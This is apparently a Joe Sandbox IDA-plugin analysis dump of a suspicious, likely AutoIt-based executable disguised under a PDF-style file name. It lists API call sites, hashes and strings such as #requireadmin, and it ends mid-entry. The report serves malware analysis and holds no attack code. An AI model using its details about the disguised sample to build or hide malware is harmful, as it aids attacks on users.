                                                    • API ID: ArraySafeVartype
                                                    • String ID:
                                                    • API String ID: 1725837607-0
                                                    • Opcode ID: e92e22537940b94113a1a16be05ec1dcc99730f38560d078b0c93966a21d2f17
                                                    • Instruction ID: 5977617bff30cc6dcb5251928ca2f84f36160dde4de5abcffe1bb1a914fd2ea8
                                                    • Opcode Fuzzy Hash: e92e22537940b94113a1a16be05ec1dcc99730f38560d078b0c93966a21d2f17
                                                    • Instruction Fuzzy Hash: 26C1B175904709DFEB06EF94C481BAEB7F4FF08315F2440AAE605EB251D734AA46CB91
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00386B63
                                                    • LoadStringW.USER32(00000000), ref: 00386B6A
                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00386B80
                                                    • LoadStringW.USER32(00000000), ref: 00386B87
                                                    • _wprintf.LIBCMT ref: 00386BAD
                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00386BCB
                                                    Strings
                                                    • %s (%d) : ==> %s: %s %s, xrefs: 00386BA8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                    • API String ID: 3648134473-3128320259
                                                    • Opcode ID: 85f9dae37007ab0ea2d3a9b4fd683efa84bb345fb9077a8f90f6df0e84c20e8f
                                                    • Instruction ID: fc4b96c33edffe49735f3634cd8fbe2fbd820d49f491060196b8023f3faa00c1
                                                    • Opcode Fuzzy Hash: 85f9dae37007ab0ea2d3a9b4fd683efa84bb345fb9077a8f90f6df0e84c20e8f
                                                    • Instruction Fuzzy Hash: 650136F65002087FE753A7949D89EF7776CD704304F0444A5B745D6041EA74AE858F75
                                                    APIs
                                                      • Part of subcall function 003A3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003A2BB5,?,?), ref: 003A3C1D
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003A2BF6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: BuffCharConnectRegistryUpper
                                                    • String ID:
                                                    • API String ID: 2595220575-0
                                                    • Opcode ID: ded6f493293875803a31399d70b8555517ecc1c5b51f068309f98245e33a2584
                                                    • Instruction ID: 410f514dd05c71118c41fd6568d337f6bb0f0ebe393afd97f0927446f033f5a0
                                                    • Opcode Fuzzy Hash: ded6f493293875803a31399d70b8555517ecc1c5b51f068309f98245e33a2584
                                                    • Instruction Fuzzy Hash: 76916B752042019FCB12EF58C891F6EB7E5FF89310F04885DF9A69B2A2DB34E945CB42
                                                    APIs
                                                    • select.WSOCK32 ref: 00399691
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0039969E
                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 003996C8
                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 003996E9
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 003996F8
                                                    • inet_ntoa.WSOCK32(?), ref: 00399765
                                                    • htons.WSOCK32(?,?,?,00000000,?), ref: 003997AA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$htonsinet_ntoaselect
                                                    • String ID:
                                                    • API String ID: 500251541-0
                                                    • Opcode ID: c37a3ac468bc2f3881ee56e51d1d37cbfca527863a28730e8ce401cdacf22120
                                                    • Instruction ID: e93d4ebc2a95d7c33b697ec605d43ce6d3973ecf4c8d0c77c660ab26bd884b8a
                                                    • Opcode Fuzzy Hash: c37a3ac468bc2f3881ee56e51d1d37cbfca527863a28730e8ce401cdacf22120
                                                    • Instruction Fuzzy Hash: 1A719C71508200ABDB16EF68CC85F6BB7E8EF85714F104A2EF5559F1A1DB70E904CB62
                                                    APIs
                                                    • __mtinitlocknum.LIBCMT ref: 0036A991
                                                      • Part of subcall function 00367D7C: __FF_MSGBANNER.LIBCMT ref: 00367D91
                                                      • Part of subcall function 00367D7C: __NMSG_WRITE.LIBCMT ref: 00367D98
                                                      • Part of subcall function 00367D7C: __malloc_crt.LIBCMT ref: 00367DB8
                                                    • __lock.LIBCMT ref: 0036A9A4
                                                    • __lock.LIBCMT ref: 0036A9F0
                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,003F6DE0,00000018,00375E7B,?,00000000,00000109), ref: 0036AA0C
                                                    • EnterCriticalSection.KERNEL32(8000000C,003F6DE0,00000018,00375E7B,?,00000000,00000109), ref: 0036AA29
                                                    • LeaveCriticalSection.KERNEL32(8000000C), ref: 0036AA39
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                    • String ID:
                                                    • API String ID: 1422805418-0
                                                    • Opcode ID: e0ab3edc8c43907d2f33b06b434f292d5e55c3ab4de5f18e361908b8eda3952a
                                                    • Instruction ID: e0ca0c807c07a164c1661d28779e29abdac6ff789007167ccfcaa95ee439b6c3
                                                    • Opcode Fuzzy Hash: e0ab3edc8c43907d2f33b06b434f292d5e55c3ab4de5f18e361908b8eda3952a
                                                    • Instruction Fuzzy Hash: 364149B1900A059BEB129FA8CA4575CBBB4AF01335F21C32EE525BF2D5D7749840CF96
                                                    APIs
                                                    • DeleteObject.GDI32(00000000), ref: 003A8EE4
                                                    • GetDC.USER32(00000000), ref: 003A8EEC
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003A8EF7
                                                    • ReleaseDC.USER32(00000000,00000000), ref: 003A8F03
                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 003A8F3F
                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 003A8F50
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,003ABD19,?,?,000000FF,00000000,?,000000FF,?), ref: 003A8F8A
                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 003A8FAA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                    • String ID:
                                                    • API String ID: 3864802216-0
                                                    • Opcode ID: 8a1a55ab1280c93704f44b365ba558e28cf1ad057ab16dee2f3044e1253f3344
                                                    • Instruction ID: b206bb6dbb6d188f0b53b1e9b5e8c75acc8f36745433df90ea34951723a39609
                                                    • Opcode Fuzzy Hash: 8a1a55ab1280c93704f44b365ba558e28cf1ad057ab16dee2f3044e1253f3344
                                                    • Instruction Fuzzy Hash: 4031AE72200214BFEB128F54DC4AFEB3BADEF4A715F054065FE48DA291CAB5A841CB70
                                                    APIs
                                                      • Part of subcall function 0035B34E: GetWindowLongW.USER32(?,000000EB), ref: 0035B35F
                                                    • GetSystemMetrics.USER32(0000000F), ref: 003B016D
                                                    • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 003B038D
                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 003B03AB
                                                    • InvalidateRect.USER32(?,00000000,00000001,?), ref: 003B03D6
                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 003B03FF
                                                    • ShowWindow.USER32(00000003,00000000), ref: 003B0421
                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 003B0440
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                    • String ID:
                                                    • API String ID: 3356174886-0
                                                    • Opcode ID: ae9dd47c9639facc13fbf931b3f62f151290bd194072636fe0aa1c6efb8bbc12
                                                    • Instruction ID: c01eec2ebe2ba0c71bd9039dc9187c5fb1d71350d0a1cea9bbcf3af9e8da6964
                                                    • Opcode Fuzzy Hash: ae9dd47c9639facc13fbf931b3f62f151290bd194072636fe0aa1c6efb8bbc12
                                                    • Instruction Fuzzy Hash: 40A1AE35600616EFDB1ACF68C9897EEBBB5BF04704F058125EE58AB690D734AD60CB90
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 55cc2250cbd13761c55aa1a1bfcde17e7f782a4c020552638347ae47696871de
                                                    • Instruction ID: 671e163fdfae88fdca0bf13dcea2d25f5dc2676f407ef60f8452ce6ccdb4c3cb
                                                    • Opcode Fuzzy Hash: 55cc2250cbd13761c55aa1a1bfcde17e7f782a4c020552638347ae47696871de
                                                    • Instruction Fuzzy Hash: F0717C70900509EFCB06CF98CC49EEEBB78FF85315F148259F915AB261C330AA15DB61
                                                    APIs
                                                    • _memset.LIBCMT ref: 003A225A
                                                    • _memset.LIBCMT ref: 003A2323
                                                    • ShellExecuteExW.SHELL32(?), ref: 003A2368
                                                      • Part of subcall function 0034936C: __swprintf.LIBCMT ref: 003493AB
                                                      • Part of subcall function 0034936C: __itow.LIBCMT ref: 003493DF
                                                      • Part of subcall function 0035C6F4: _wcscpy.LIBCMT ref: 0035C717
                                                    • CloseHandle.KERNEL32(00000000), ref: 003A242F
                                                    • FreeLibrary.KERNEL32(00000000), ref: 003A243E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                    • String ID: @
                                                    • API String ID: 4082843840-2766056989
                                                    • Opcode ID: f40a897845cd8b1fd11958b55f7c1a7e3cf63ebce341cf0eb5da022310f3b9b0
                                                    • Instruction ID: 5079938de42c4fbd11d3a2c863e3969c2ce58249d2e5e01c407536ef24a0aaa3
                                                    • Opcode Fuzzy Hash: f40a897845cd8b1fd11958b55f7c1a7e3cf63ebce341cf0eb5da022310f3b9b0
                                                    • Instruction Fuzzy Hash: 59716174A006199FCF16EF98C8819AEB7F5FF49310F118459E856AF3A1DB34AD40CB90
                                                    APIs
                                                    • GetParent.USER32(?), ref: 00383DE7
                                                    • GetKeyboardState.USER32(?), ref: 00383DFC
                                                    • SetKeyboardState.USER32(?), ref: 00383E5D
                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00383E8B
                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 00383EAA
                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00383EF0
                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00383F13
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$Parent
                                                    • String ID:
                                                    • API String ID: 87235514-0
                                                    • Opcode ID: 47fd8f833a1a67be70eb87bcb22ebb1e21f8c20bdf188542e632591ac82e42d9
                                                    • Instruction ID: 8483933eeb60e07cead857a79932aa283c8e298151f4f2f26c4bf91d54d34fc4
                                                    • Opcode Fuzzy Hash: 47fd8f833a1a67be70eb87bcb22ebb1e21f8c20bdf188542e632591ac82e42d9
                                                    • Instruction Fuzzy Hash: 8E51F4A1A047D53EFB3763348C45BBA7EA95B06B04F0944C8F1D58A9C2D3E8AEC8D750
                                                    APIs
                                                    • GetParent.USER32(00000000), ref: 00383C02
                                                    • GetKeyboardState.USER32(?), ref: 00383C17
                                                    • SetKeyboardState.USER32(?), ref: 00383C78
                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00383CA4
                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00383CC1
                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00383D05
                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00383D26
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$Parent
                                                    • String ID:
                                                    • API String ID: 87235514-0
                                                    • Opcode ID: 01c66fbb498d5497f832225bdb6ed5e8a29cf276e6ef2cd95ca871487bfcba3b
                                                    • Instruction ID: 9c0e800cc63808eb2ec60b98ce259b3c2d92f8e43fab9d7b3d86911d72da8206
                                                    • Opcode Fuzzy Hash: 01c66fbb498d5497f832225bdb6ed5e8a29cf276e6ef2cd95ca871487bfcba3b
                                                    • Instruction Fuzzy Hash: 315107A05047D53DFB33A7748C55BB6BFA96B06B00F0884C8E0D55AAC2D294EE98E760
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: _wcsncpy$LocalTime
                                                    • String ID:
                                                    • API String ID: 2945705084-0
                                                    • Opcode ID: 84a97c9a90079d78e15fcb0c103ac0b20312a6abbb7d217b9cea214a33c23616
                                                    • Instruction ID: b9b6811044bc5678ef74421c8ff9e2801de7f2c1aa891fc07cb302a7236911a9
                                                    • Opcode Fuzzy Hash: 84a97c9a90079d78e15fcb0c103ac0b20312a6abbb7d217b9cea214a33c23616
                                                    • Instruction Fuzzy Hash: C1417166C20314B6CB12EBF4CC469CFB3AD9F04310F6589A6E518F7165FA74E614C3A9
                                                    APIs
                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 003A3DA1
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003A3DCB
                                                    • FreeLibrary.KERNEL32(00000000), ref: 003A3E80
                                                      • Part of subcall function 003A3D72: RegCloseKey.ADVAPI32(?), ref: 003A3DE8
                                                      • Part of subcall function 003A3D72: FreeLibrary.KERNEL32(?), ref: 003A3E3A
                                                      • Part of subcall function 003A3D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 003A3E5D
                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 003A3E25
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                    • String ID:
                                                    • API String ID: 395352322-0
                                                    • Opcode ID: 48fb64b555d15c7bbe689d2772705a40b1e5b365c8174e5102f8d96c3df7efd6
                                                    • Instruction ID: ec0284f80e3e3f3d6f05062f3ac9edbffd21b54680185d49b59224e41c6ee1e7
                                                    • Opcode Fuzzy Hash: 48fb64b555d15c7bbe689d2772705a40b1e5b365c8174e5102f8d96c3df7efd6
                                                    • Instruction Fuzzy Hash: B531CAB2901119BFDB169B94DC89EFFB7BCEF09300F00016AF512E6150D674AF499BA0
                                                    APIs
                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 003A8FE7
                                                    • GetWindowLongW.USER32(00C6E818,000000F0), ref: 003A901A
                                                    • GetWindowLongW.USER32(00C6E818,000000F0), ref: 003A904F
                                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 003A9081
                                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 003A90AB
                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 003A90BC
                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 003A90D6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: LongWindow$MessageSend
                                                    • String ID:
                                                    • API String ID: 2178440468-0
                                                    • Opcode ID: 1ad704f65dfc0fd2862421752863391b9ba608108ae3ac9a571d5e30594790a5
                                                    • Instruction ID: 74ec546bb8dfb378f72dd6d11d2421d7edb6d7747738e28431fafc3f25e7d7c8
                                                    • Opcode Fuzzy Hash: 1ad704f65dfc0fd2862421752863391b9ba608108ae3ac9a571d5e30594790a5
                                                    • Instruction Fuzzy Hash: C2313334600215AFDB22CF58DC84F6437A9FB4A354F1641A6F619EF2B1CBB2A840CB44
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003808F2
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00380918
                                                    • SysAllocString.OLEAUT32(00000000), ref: 0038091B
                                                    • SysAllocString.OLEAUT32(?), ref: 00380939
                                                    • SysFreeString.OLEAUT32(?), ref: 00380942
                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00380967
                                                    • SysAllocString.OLEAUT32(?), ref: 00380975
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                    • String ID:
                                                    • API String ID: 3761583154-0
                                                    • Opcode ID: 285615a85d00332ab1a1796043ac70bce0678a14c8e3470ca020bebae5b34717
                                                    • Instruction ID: 5e31ac59403317fd1724fdf8aaeb92f63097e7d5354718ded1092a0e3d099f03
                                                    • Opcode Fuzzy Hash: 285615a85d00332ab1a1796043ac70bce0678a14c8e3470ca020bebae5b34717
                                                    • Instruction Fuzzy Hash: 7921B572600308AFAB55AF78CC88DBB73ACEB09360B018125F915DB161DB70EC498B60
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: __wcsnicmp
                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                    • API String ID: 1038674560-2734436370
                                                    • Opcode ID: 54b601885daffb766ec5884549b46543e726c5afe8fe1bc0690a8b1d317a2231
                                                    • Instruction ID: 871aff683e4d8fb6c4707b7e8dd922ba7b85728bb70a4e732b697924964b1a43
                                                    • Opcode Fuzzy Hash: 54b601885daffb766ec5884549b46543e726c5afe8fe1bc0690a8b1d317a2231
                                                    • Instruction Fuzzy Hash: 10219B7224431177C733BA35DC02FBBB39CEF66300F24806AF8469B196E7519A42C3A0
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003809CB
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003809F1
                                                    • SysAllocString.OLEAUT32(00000000), ref: 003809F4
                                                    • SysAllocString.OLEAUT32 ref: 00380A15
                                                    • SysFreeString.OLEAUT32 ref: 00380A1E
                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00380A38
                                                    • SysAllocString.OLEAUT32(?), ref: 00380A46
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
